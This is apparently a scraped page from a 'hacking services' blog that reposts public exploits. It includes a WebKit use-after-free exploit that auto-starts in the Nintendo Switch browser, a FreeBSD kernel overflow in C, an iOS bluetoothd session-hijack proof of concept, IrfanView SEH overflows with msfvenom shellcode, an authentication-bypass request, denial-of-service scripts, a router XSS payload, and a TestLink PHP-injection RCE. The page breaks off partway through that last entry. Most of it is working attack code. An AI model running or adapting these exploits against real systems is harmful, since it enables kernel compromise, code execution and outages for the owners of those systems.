<!doctype html>
<html>
<head>
<title>CVE-2016-4657 Switch PoC</title>
<style>
body {font-size: 2em;}
a {text-decoration: none; color: #000;}
a:hover {color: #f00; font-weight: bold;}
</style>
</head>
<body>
<h1>CVE-2016-4657 Nintendo Switch PoC</h1>
<ul>
<li><a href=\'javascript:go();\'> go!</a></li>
<li><a href=\'javascript:document.location.reload();\'> reload</a></li>
</ul>
<div id=\'status\'> waiting... click go.</div>
<script>
// display JS errors as alerts. Helps debugging.
window.onerror = function(error, url, line) {
alert(error+\' URL:\'+url+\' L:\'+line);
};
</script>
<script>
// based on jbme.qwertyoruiop.com
// Thanks to:
// + qwertyoruiop
// + Retr0id
// + Ando
//
// saelo\'s phrack article is invaluable: http://www.phrack.org/papers/attacking_javascript_engines.html
// garbage collection stuff
var pressure = new Array(100);
// do garbage collect
dgc = function() {
for (var i = 0; i < pressure.length; i++) {
pressure[i] = new Uint32Array(0x10000);
}
for (var i = 0; i < pressure.length; i++) {
pressure[i] = 0;
}
}
// access to the overlapping Uint32Array
var bufs = new Array(0x1000);
// we will modify the vector of this
var smash = new Uint32Array(0x10);
// the array with the stale pointer
var stale = 0;
var _dview = null;
// write 2x 32bit in a DataView and get the Float representation of it
function u2d(low, hi) {
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
_dview.setUint32(0, hi);
_dview.setUint32(4, low);
return _dview.getFloat64(0);
}
function go_() {
// check if the length of the array smash changed already. if yes, bail out.
if (smash.length != 0x10) return;
// garbage collect
dgc();
// new array with 0x100 elements
var arr = new Array(0x100);
// new array buffer of length 0x1000
var yolo = new ArrayBuffer(0x1000);
// populate the arr with pointer to yolo and a number. not quite sure why.
arr[0] = yolo;
arr[1] = 0x13371337;
// create an object whos toString function returns number 10 and messes with arr.
var not_number = {};
not_number.toString = function() {
arr = null;
props[\"stale\"][\"value\"] = null;
// if bufs is already overlapping memory, bail out.
if (bufs[0]) return 10;
// really make sure garbage is collected
// the array pointed at by arr should be gone now.
for (var i = 0; i < 20; i++) {
dgc();
}
// for the whole buf Array
for (i = 0; i < bufs.length; i++) {
// fill it with a lot of Uint32Arrays, hopefully allocated where arr was earlier
bufs[i] = new Uint32Array(0x100 * 2)
// for each element of that array
for (k = 0; k < bufs[i].length;) {
// set memory to 0x41414141 0xffff0000
// basically spraying the JSValue 0xffff000041414141
// which is the Integer 0x41414141
// phrack: Integer FFFF:0000:IIII:IIII
bufs[i][k++] = 0x41414141;
bufs[i][k++] = 0xffff0000;
}
}
return 10;
};
// define a new object with some properties
var props = {
p0: { value: 0 },
p1: { value: 1 },
p2: { value: 2 },
p3: { value: 3 },
p4: { value: 4 },
p5: { value: 5 },
p6: { value: 6 },
p7: { value: 7 },
p8: { value: 8 },
// the length of this object is set to this object that does evil stuff with toString()
length: { value: not_number },
// the reference to the arr array. Which will later be freed.
stale: { value: arr },
after: { value: 666 }
};
// define a new target array
var target = [];
// TRIGGER BUG!
// set the properties of the target based on the previously defined ones
Object.defineProperties(target, props);
// get a reference to the target stale property, which points to arr
stale = target.stale;
// make sure that the stale[0] points actually to the 0x41414141 data if not, we don\'t wanna mess with it and try again
if(stale[0]==0x41414141) {
// stale[0] is now pointing at a fake Integer 0x41414141. Now make it 0x41414242
stale[0] += 0x101;
//stale[0] = 0x41414242;
//document.getElementById(\'status\').innerText = \'bug done.\';
// searching the whole memory that is overlaying the old arr. Looking for 0x41414242
for (i = 0; i < bufs.length; i++) {
for (k = 0; k < bufs[0].length; k++) {
// Found the value! bufs[i][k] point now at the same memory as stale[0]
if (bufs[i][k] == 0x41414242) {
alert(\'Overlapping Arrays found at bufs[\'+i+\'][\'+k+\']\\nsmash.length is still: 0x\'+smash.length.toString(16));
// create a new object. Will look kinda like this:
// 0x0100150000000136 0x0000000000000000 <- fictional value
// 0x0000000000000064 0x0000000000000000 <- [\'a\'],[\'b\']
// 0x???????????????? 0x0000000000000100 <- [\'c\'],[\'d\']
stale[0] = {
\'a\': u2d(105, 0), // the JSObject properties ; 105 is the Structure ID of Uint32Array
\'b\': u2d(0, 0),
\'c\': smash, // var pointing at the struct of a Uint32Array(0x10)
\'d\': u2d(0x100, 0)
}
alert(\'created the JSObject.\\nstale[0] = \'+stale[0]);
// remember the original stale pointer, pointing at the object with the a,b,c,d properties
stale[1] = stale[0];
// now add 0x10 to the pointer of stale[0], which points now in the middle of the object.
bufs[i][k] += 0x10;
// check the type of stale[0].
// removed the loop because it makes the exploit sooooooo unreliable
// based on phrack paper - Predicting structure IDs (http://www.phrack.org/papers/attacking_javascript_engines.html)
/*while(!(stale[0] instanceof Uint32Array)) {
// if stale[0] is not a Uint32Array yet, increment the structureID guess
structureID++;
// assign the next structureID to the original object still referenced by stale[1]
stale[1][\'a\'] = u2d(structureID, 0);
}*/
// Give some information. stale[0] should now be a Uint32Array
alert(\'misaligned the pointer to the JSObject.\\nstale[0] = \'+stale[0]+\'\');
// write to the 6th 32bit value of the memory pointed to by the crafted Uint32Array
// which should point to the struct of smash, allowing us to overwrite the length of smash
stale[0][6] = 0x1337;
// check the length of smash is now.
alert(\'smash.length is now: 0x\'+smash.length.toString(16));
alert(\'done!\\nswitch will probably crash now :O\');
return;
}
}
}
}
document.getElementById(\'status\').innerText = \' fail. refresh the page and try again...\';
setTimeout(function() {document.location.reload();}, 1000);
}
function go() {
document.getElementById(\'status\').innerText = \' go! \';
dgc();
dgc();
dgc();
dgc();
dgc();
dgc();
setTimeout(go_, 500);
}
// if Switch browser is detected, auto start exploit
if(navigator.userAgent.indexOf(\'Nintendo Switch\')>-1) {
document.getElementById(\'status\').innerText = \'Found Nintendo Switch! \';
setTimeout(go, 2000);
}
</script>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863562422
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/param.h>
#include <sys/linker.h>
void *(*ata_get_xport)(void);
int (*kprintf)(const char *fmt, ...);
char *ostype;
void *resolve(char *name) {
struct kld_sym_lookup ksym;
ksym.version = sizeof(ksym);
ksym.symname = name;
if(kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
perror("kldsym");
exit(1);
}
printf(" [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
return (void *)ksym.symvalue;
}
void dummy(void) {
}
void payload(void) {
kprintf(" [+] Entered kernel payload\n");
strcpy(ostype, "CTurt ");
}
#define INFO_SIZE 0
#define INFO_LIMIT 1
#define INFO_USED 2
#define INFO_FREE 3
#define INFO_REQ 4
#define INFO_FAIL 5
int getZoneInfo(char *zname, int i) {
#define BUF_SIZE 256
#define LINE_SIZE 56
unsigned int info[6] = { 0 };
FILE *fp = NULL;
char buf[BUF_SIZE];
char iname[LINE_SIZE];
fp = popen("/usr/bin/vmstat -z", "r");
if(fp == NULL) {
perror("popen");
exit(1);
}
memset(buf, 0, sizeof(buf));
memset(iname, 0, sizeof(iname));
while(fgets(buf, sizeof(buf) - 1, fp) != NULL) {
sscanf(buf, "%s %u, %u, %u, %u, %u, %u\n", iname, &info[INFO_SIZE], &info[INFO_LIMIT],
&info[INFO_USED], &info[INFO_FREE], &info[INFO_REQ], &info[INFO_FAIL]);
if(strncmp(iname, zname, strlen(zname)) == 0 && iname[strlen(zname)] == ':') {
break;
}
}
pclose(fp);
return info[i];
}
void craftCorruptedZone(void *zone) {
void **uz_slab = (void **)(zone + 200);
void **uz_dtor = (void **)(zone + 216);
void **uz_fini = (void **)(zone + 232);
void **uz_import = (void **)(zone + 240);
void **uz_release = (void **)(zone + 248);
*uz_slab = dummy;
*uz_fini = payload;
*uz_import = dummy;
*uz_release = dummy;
}
void craftZone(void *zone) {
void **uz_slab = (void **)(zone + 200);
void **uz_dtor = (void **)(zone + 216);
void **uz_fini = (void **)(zone + 232);
void **uz_import = (void **)(zone + 240);
void **uz_release = (void **)(zone + 248);
// put valid kernel address
*uz_slab = ata_get_xport;
*uz_fini = ata_get_xport;
*uz_import = ata_get_xport;
*uz_release = ata_get_xport;
}
int main(void) {
int sock;
struct msghdr msg;
ata_get_xport = resolve("ata_get_xport");
kprintf = resolve("printf");
ostype = resolve("ostype");
const int previousAllocations = getZoneInfo("mbuf", INFO_USED);
const size_t bufferSize = getZoneInfo("mbuf", INFO_SIZE);
const size_t overflowSize = previousAllocations * bufferSize + 0x4000;
char *mapping, *buffer, *overflow;
const size_t copySize = bufferSize + overflowSize;
const size_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
munmap(mapping + mappingSize, PAGE_SIZE);
buffer = mapping + mappingSize - copySize;
overflow = buffer + bufferSize;
memset(overflow, 0, overflowSize);
// sizeof(struct uma_zone) == 0x300, but since we can't be certain exactly where we overflow from, we will craft at 256 byte intervals
for(size_t i = previousAllocations * bufferSize + 0xe0; i < overflowSize - 256; i += 256) {
craftCorruptedZone(overflow + i);
}
sock = socket(AF_INET, SOCK_STREAM, 0);
memset(&msg, 0, sizeof(msg));
msg.msg_control = buffer;
msg.msg_controllen = -1;
printf(" [+] Performing overflow\n");
sendmsg(sock, &msg, 0);
printf(" [+] Triggering payload\n");
close(sock);
sock = socket(AF_INET, SOCK_STREAM, 0);
for(size_t i = previousAllocations * bufferSize + 0xe0; i < overflowSize - 256; i += 256) {
craftZone(overflow + i);
}
printf(" [+] Performing overflow\n");
sendmsg(sock, &msg, 0);
munmap(mapping, mappingSize);
return 0;
}
//
// main.m
// bluetoothdPoC
//
// Created by Rani Idan.
// Copyright © 2018 zLabs. All rights reserved.
//
#import "AppDelegate.h"
#include <mach/mach.h>
extern kern_return_t bootstrap_look_up(mach_port_t bs, const char *service_name, mach_port_t *service);
/* When hijacking session between bluetoothd and client, add callback to the client and jump to CALLBACK_ADDRESS with CALLBACK_ADDITIONAL_DATA */
#define CALLBACK_ADDRESS 0xdeadbeef
#define CALLBACK_ADDITIONAL_DATA 0x13371337
#define BLUETOOTHD_CONST 0xFA300
#define BLUETOOTHD_WRONG_TOKEN 7
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE 0x44
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE 0x48
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS 0x113
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID 3
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT 0x1000
#define BLUETOOTHD_MIG_SERVER_NAME "com.apple.server.bluetooth"
#define ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET 0x20
#define ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET 0x20
#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET 0x28
#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA 0x40
typedef unsigned int mach_msg_return_value;
mach_port_t get_service_port(char *service_name)
{
kern_return_t ret = KERN_SUCCESS;
mach_port_t service_port = MACH_PORT_NULL;
mach_port_t bs = MACH_PORT_NULL;
ret = task_get_bootstrap_port(mach_task_self(), &bs);
ret = bootstrap_look_up(bootstrap_port, service_name, &service_port);
if (ret)
{
NSLog(@"Couldn't find port for %s",service_name);
return MACH_PORT_NULL;
}
NSLog(@"Got port: %x", service_port);
mach_port_deallocate(mach_task_self(), bs);
return service_port;
}
mach_msg_return_value BTLocalDevice_add_callback(mach_port_t bluetoothd_port, mach_port_t session_token, void* callback_address, long additional_data)
{
mach_port_t receive_port = MACH_PORT_NULL;
mach_msg_header_t * message = NULL;
char *data = NULL;
kern_return_t ret = KERN_SUCCESS;
mach_msg_return_value return_value = 0;
mach_msg_id_t msgh_id = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID;
mach_msg_size_t recv_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE;
mach_msg_size_t send_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE;
mach_msg_option_t options = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS;
mach_msg_size_t msg_size = MAX(recv_size, send_size);
ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &receive_port);
if ( ret != KERN_SUCCESS)
{
return_value = -3;
NSLog(@"Failed to allocate port ret=%x", ret);
NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
goto cleanup;
}
ret = mach_port_insert_right(mach_task_self(), receive_port, receive_port, MACH_MSG_TYPE_MAKE_SEND);
if ( ret != KERN_SUCCESS)
{
return_value = -3;
NSLog(@"Failed to insert port right ret=%x", ret);
NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
goto cleanup;
}
message = malloc(msg_size);
data = (char *)message;
memset(message, 0, msg_size);
*((mach_port_t *)(data+ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET)) = session_token;
*((void **)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET)) = callback_address;
*((long *)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA)) = additional_data;
message->msgh_bits = 0x1513 ;
message->msgh_remote_port = bluetoothd_port; /* Request port */
message->msgh_local_port = receive_port; /* Reply port */
message->msgh_size = send_size; /* Message size */
message->msgh_reserved = 0;
message->msgh_id = BLUETOOTHD_CONST + msgh_id;
ret = mach_msg(message, /* The header */
options, /* Flags */
send_size, /* Send size */
recv_size, /* Max receive Size */
receive_port, /* Receive port */
BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT, /* No timeout */
MACH_PORT_NULL); /* No notification */
if(MACH_MSG_SUCCESS == ret)
{
return_value = *(mach_msg_return_value *) (((char *) message) + ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET);
if (return_value != BLUETOOTHD_WRONG_TOKEN) {
NSLog(@"Sent message id %d with token %x, returned: %x", msgh_id, session_token, return_value);
}
} else if (MACH_RCV_INVALID_NAME == ret)
{
NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
NSLog(@"mach_error_int: ret=%x", ret);
NSLog(@"mach_remote_port: %x", message->msgh_remote_port);
return_value = -2;
}
else {
NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
NSLog(@"mach_error_int: ret=%x", ret);
NSLog(@"mach_remote_port: %x", message->msgh_remote_port);
return_value = -1;
}
cleanup:
if(MACH_PORT_NULL != receive_port)
{
mach_port_destroy(mach_task_self(), receive_port);
}
if (NULL != message) {
free(message);
}
return return_value;
}
void try_to_add_callback_BTLocalDeviceAddCallbacks(void * address, long value)
{
int ports_found[0xffff] = {0};
int number_of_ports_found = 0;
mach_port_t bluetoothd_port = get_service_port(BLUETOOTHD_MIG_SERVER_NAME);
if (MACH_PORT_NULL == bluetoothd_port)
{
NSLog(@"Couldn't have bluetoothd port");
return;
}
NSLog(@"Starting to look for session tokens");
for (int i = 0; i <= 0xffff; i++) {
int id = 0;
id = (i << 16) + 1;
int result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
{
NSLog(@"Found port: %x", id);
ports_found[number_of_ports_found] = id;
number_of_ports_found ++;
}
id = (i << 16) + 2;
result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
{
NSLog(@"Found port: %x", id);
ports_found[number_of_ports_found] = id;
number_of_ports_found ++;
}
id = (i << 16);
result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
{
NSLog(@"Found port: %x", id);
ports_found[number_of_ports_found] = id;
number_of_ports_found ++;
}
}
for (int i = number_of_ports_found-1; i>=0; i--) {
NSLog(@"Adding callback: Port=%x address=%x value=%x", ports_found[i], (unsigned int)address, (unsigned int)value);
BTLocalDevice_add_callback(bluetoothd_port, ports_found[i],address, value);
}
NSLog(@"Done");
return;
}
void trigger() {
try_to_add_callback_BTLocalDeviceAddCallbacks((void *)CALLBACK_ADDRESS, CALLBACK_ADDITIONAL_DATA);
}
int main(int argc, char * argv[]) {
trigger();
}
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.44 Email PlugIn - Local Buffer Overflow (SEH)
# Date: 02-07-2018
# Vulnerable Software: IrfanView 4.44 Email PlugIn
# Vendor Homepage: http://www.irfanview.com/
# Version: 4.44
# Software Link: http://www.irfanview.info/files/irfanview_444.exe
# Software Link: http://www.irfanview.info/files/irfanview_plugins_444.zip
# Tested On: Windows XP SP3 x86 and Windows 7 SP1 x86
#
# PoC
# 1. generate irfan.txt, copy contents to clipboard
# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
# 3. select Options, Send by Email, Settings
# 4. paste contents from clipboard into Full Name and select OK
# 5. application crashes
# 6. pop calc
#
filename="irfan.txt"
junk = "\x41"*1236
#jump 6
nseh = "\xeb\x06\x90\x90"
#0x10021420 : pop ebp # pop ebx # ret
seh = "\x20\x14\x02\x10"
#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c
#Payload size: 220 bytes
calc = (
"\xda\xdf\xba\x32\x98\xc1\x8e\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x31\x83\xe8\xfc\x31\x50\x14\x03\x50\x26\x7a\x34\x72\xae\xf8"
"\xb7\x8b\x2e\x9d\x3e\x6e\x1f\x9d\x25\xfa\x0f\x2d\x2d\xae\xa3"
"\xc6\x63\x5b\x30\xaa\xab\x6c\xf1\x01\x8a\x43\x02\x39\xee\xc2"
"\x80\x40\x23\x25\xb9\x8a\x36\x24\xfe\xf7\xbb\x74\x57\x73\x69"
"\x69\xdc\xc9\xb2\x02\xae\xdc\xb2\xf7\x66\xde\x93\xa9\xfd\xb9"
"\x33\x4b\xd2\xb1\x7d\x53\x37\xff\x34\xe8\x83\x8b\xc6\x38\xda"
"\x74\x64\x05\xd3\x86\x74\x41\xd3\x78\x03\xbb\x20\x04\x14\x78"
"\x5b\xd2\x91\x9b\xfb\x91\x02\x40\xfa\x76\xd4\x03\xf0\x33\x92"
"\x4c\x14\xc5\x77\xe7\x20\x4e\x76\x28\xa1\x14\x5d\xec\xea\xcf"
"\xfc\xb5\x56\xa1\x01\xa5\x39\x1e\xa4\xad\xd7\x4b\xd5\xef\xbd"
"\x8a\x6b\x8a\xf3\x8d\x73\x95\xa3\xe5\x42\x1e\x2c\x71\x5b\xf5"
"\x09\x8d\x11\x54\x3b\x06\xfc\x0c\x7e\x4b\xff\xfa\xbc\x72\x7c"
"\x0f\x3c\x81\x9c\x7a\x39\xcd\x1a\x96\x33\x5e\xcf\x98\xe0\x5f"
"\xda\xfa\x67\xcc\x86\xd2\x02\x74\x2c\x2b")
fill = "\x44"*1000
buffer = junk + nseh + seh + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Exploit Title: antMan <= 0.9.0c Authentication Bypass
# Date: 02-27-2018
# Software Link: https://www.antsle.com
# Version: <= 0.9.0c
# Tested on: 0.9.0c
# Exploit Author: Joshua Bowser
# Contact: joshua.bowser@codecatoctin.com
# Website: http://www.codecatoctin.com
# Category: web apps
1. Description
antMan versions <= 0.9.c contain a critical authentication defect, allowing an unauthenticated attacker to obtain root permissions within the antMan web management console.
http://blog.codecatoctin.com/2018/02/antman-authentication-bypass.html
2. Proof of Concept
The antMan authentication implementation obtains user-supplied username and password parameters from a POST request issued to /login. Next, antMan utilizes Java’s ProcessBuilder class to invoke, as root, a bash script called antsle-auth.
This script contains two critical defects that allow an attacker to bypass the authentication checks. By changing the username to > and the password to a url-encoded linefeed (%0a), we can force the authentication script to produce return values not anticipated by the developer.
To exploit these defects, use a web proxy to intercept the login attempt and modify the POST parameters as follows:
#-------------------------
POST /login HTTP/1.1
Host: 10.1.1.7:3000
[snip]
username= > &password=%0a
#-------------------------
You will now be successfully authenticated to antMan as the administrative root user.
3. Solution:
Update to version 0.9.1a
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SEGGER-embOS-FTP-SERVER-v3.22-FTP-COMMANDS-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security
Vendor:
=============
www.segger.com
Product:
===========
embOS/IP FTP Server v3.22
Vulnerability Type:
===================
FTP Commands Denial Of Service
CVE Reference:
==============
CVE-2018-7449
Security Issue:
================
SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash)
via an invalid LIST, STOR, or RETR command.
STOR 666\r\n
LIST\r\n
RETR '+'..\\'*8+'Windows\system.ini\r\n
TELNET x.x.x.x 21
220 Welcome to embOS/IP FTP server
USER anonymous
331 Password required.
PASS anonymous
230 User logged in, proceed.
STOR Bye!
CRASH!!!
Exploit/POC:
=============
import socket,time
VICTIM=raw_input('[+]Segger v3.22 FTP Server IP > ')
USR='anonymous'
PWD='anonymous'
CMD="STOR Bye!\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((VICTIM, 21))
print s.recv(1024) # Recieve FTP Banner
time.sleep(1)
s.send("USER " + USR+ "\r\n")
print s.recv(1024)
time.sleep(1)
s.send("PASS "+ PWD+"\r\n") #
print s.recv(1024)
time.sleep(1)
s.send(CMD)
print 'Sent %s' % CMD
s.close()
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: February 17, 2018
Vendor acknowledgement: February 19, 2018
Vendor released fixed version v3.22a : February 23, 2018
March 1, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
########################################################################
# Exploit Title: D-Link DIR-600M Wireless - Persistent Cross Site Scripting
# Date: 11.02.2018
# Vendor Homepage: http://www.dlink.co.in
# Hardware Link: http://www.dlink.co.in/products/?pid=DIR-600M
# Category: Hardware
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Hardware Version: C1
# Firmware version: 3.01
# Tested on: Linux Mint
# CVE: CVE-2018-6936
##########################################################################
Reproduction Steps:
- Goto your wifi router gateway [i.e: http://192.168.0.1]
- Go to --> "Maintainence" --> "Admin"
- Create a user with name "<script>alert("PKP")</script>"
- Refresh the page and you will be having "PKP" popup
Note: It can also be done by changing SSID name to "<script>alert("PKP")</script>"
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.50 Email PlugIn - Local Buffer Overflow (SEH Unicode)
# Date: 02-07-2018
# Vulnerable Software: IrfanView 4.50 Email PlugIn
# Vendor Homepage: http://www.irfanview.com/
# Version: 4.50
# Software Link: http://www.irfanview.info/files/irfanview_450.exe
# Software Link: http://www.irfanview.info/files/irfanview_plugins_450.zip
# Tested Windows 7 SP1 x86
#
# More reliable result if .NET and updates installed prior to application being installed
#
#
# PoC
# 1. generate irfan.txt, copy contents to clipboard
# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
# 3. select Options, Send by Email, Settings
# 4. paste contents from clipboard into Full Name and select OK
# 5. application crashes
# 6. pop calc
# ****if calc doesn't pop on first try, repeat steps 2-4 until it does :/
#
filename="irfan.txt"
#junk to offset
junk = "\x41"*262
#popad
nseh = "\x61\x62"
#0x00500102 pop esi pop ebx ret
#unicode possible ansi transform(s) : 0050008A->00500106,ascii {PAGE_EXECUTE_READ} [i_view32.exe]
seh = "\x8a\x50"
valign = (
"\x55" #push ebp
"\x47" #align
"\x58" #pop eax
"\x47" #align
"\x05\x14\x11" #add eax,400
"\x47" #align
"\x2d\x13\x11" #sub eax,300
"\x47" #align
"\x50" #push eax
"\x47" #align
"\xc3" #retn
)
#nops to shellcode
nops = "\x71" * 109
#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX
calc = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ"
"ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHE2KPKPM0C0U9IU01I02D4K0P004"
"K0RLLTK0RLT4KT2NHLOH7OZO601KOVLOLQQSLLBNLMPWQHOLMM197K2KBQB0WTK0RN0DKPJOLDK0LLQR"
"XIS18M1J121TK1IMPKQYC4KPILXJCOJQ9TKOD4KKQ8VP1KOFL91XOLMM1WWP8IPD5ZVLCCMKHOKSMO42"
"UK428DKPXNDM1ICBFTKLLPKDKB8MLM19CDKLD4KKQHP3YQ4O4MTQKQK1Q291JPQKOIP1OQOPZ4KLRJK4M"
"1MRJM14MU5WBM0M0M0R0QX014K2OTGKO9EGKL06UFBB6C85VF5GM5MKOJ5OLKVSLKZE0KKIPBUM57KQ7M"
"CSB2ORJM0PSKOIEBCC1BL1SNN2E2XC5M0AA"
)
#necessary fill
fill = "\x71"*1000
buffer = junk + nseh + seh + valign + nops + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DUALDESK-v20-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security
Vendor:
===============
www.dualdesk.com
Product:
===========
DualDesk v20
DualDesk is powerful, easy to use remote support software that is a one-time purchase and lets your
technical support staff remote assist a PC anywhere on the internet through firewalls in seconds with no
configuration.
Vulnerability Type:
===================
Denial Of Service
CVE Reference:
==============
CVE-2018-7583
Security Issue:
================
Remote unauthenticated attackers can crash the "Proxy.exe" Server component of Dualdesk application
which listens on TCP Port 5500 by sending a long string of junk chars.
(d24.d60): Security check failure or stack buffer overrun - code c0000409 (first/second chance not available)
eax=00000000 ebx=0257f1c0 ecx=00000000 edx=00000000 esi=00000002 edi=00000000
eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtWaitForMultipleObjects+0x15:
77c6016d 83c404 add esp,4
Exploit/POC:
=============
Start the Dualdesk Run Proxy as Application.
C:\>python -c "print 'a'*8000" > crash.txt
C:\>type crash.txt | nc.exe localhost 5500
Crash!!!
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: February 4, 2018
Second attempt : February 17, 2018
Request CVE, assigned by Mitre : March 1, 2018
March 1, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
# Title: TestLink Open Source Test Management(<= 1.9.16) Remote Code Execution By Manish (error1046)
Vendor Home Page: http://testlink.org
Disovered At: Indishell Lab
CVE ID: CVE-2018-7466
///////////
//OverView
///////////
Testlink (Version Below 1.9.17) is vulnerable to Remote Code Execution.
Vulnerable code is in file "install/installNewDB.php". Testlink allows user to re-install it and when user visits "/install/" directory and reachs to "Database detail" page i.e "install/installNewDB.php", user can specifiy PHP code in "TestLink DB login" field.
After successful installation, PHP code will get save in config file.
Exploitation
During installation process, script first try to connect MySQL "root" user account (supplied by user during installation phase), if script is able to connect to MySQL server (locally or remotly hosted), process of CMS installation goes further.
Script save MySQL server host, username and password in config file.
Here attacker can take advantage of this process to write PHP code in config file.
To do this, attacker need to setup MySQL server on a machine and MySQL server must be configure to accept connection from remote IP (which can be done easily by changing parameter in my.cnf file).
To configure MySQL server open to remote connection, just open my.cnf file and do below mentioned steps
-> comment out skip-networking as well as bind-address (if any present in my.cnf )i.e change line
skip-networking
to
# skip-networking
and
bind-address = some_ip
to
#bind-address = some_ip
save the my.cnf file. reload/restart MySQL server and your mysql server will accept remote connection from any remote IP
Now, you need to configure MySQL root user in such way so that when remote script try to connect to MySQL server root user, it allows remote script.
When attacker provide credentials of a Remote MySQL server which is attacker controlled and listening for remote connection, attacker just need to specify the remote MySQL server IP, root users username, password and need to specify below mentioned PHP code in "TestLink DB login" field (or in HTTP POST parameter tl_loginname).
"box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//"
Once script establish successful connection to root user account of remote MySQL server, it will create MySQL user with name
"box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" and will write this username name in config_db.inc.php file. After that attacker just need to need to access the config file config_db.inc.php with following GET hethod HTTP parameters
